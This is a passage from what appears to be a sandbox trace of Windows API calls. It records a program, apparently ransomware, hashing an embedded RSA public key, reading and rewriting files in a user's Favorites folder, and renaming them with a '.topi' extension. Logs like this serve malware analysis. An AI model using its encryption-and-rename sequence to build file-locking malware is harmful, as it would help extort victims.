KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.321] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.321] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.322] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0096.322] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.322] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.323] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.323] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.323] GetLastError () returned 0x0 [0096.323] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.323] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0096.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.323] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.323] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.323] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.323] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.323] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.323] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.324] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.topi")) returned 1 [0096.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.325] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.325] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.326] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0096.326] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0096.326] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0096.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.326] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.326] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.332] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.332] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.333] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0096.334] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.334] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.334] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.334] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.334] GetLastError () returned 0x0 [0096.334] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.334] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0096.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.334] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.334] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.334] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.335] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02708 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9888 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02750 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98a0 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.335] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0096.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98e8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d98d0 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.336] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.337] GetCurrentThreadId () returned 0x8c4 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7b60 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.337] GetCurrentThreadId () returned 0x8c4 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0096.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98b8 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0096.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6d4bd0 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98b8 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98a0 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02750 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.341] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.341] HeapFree 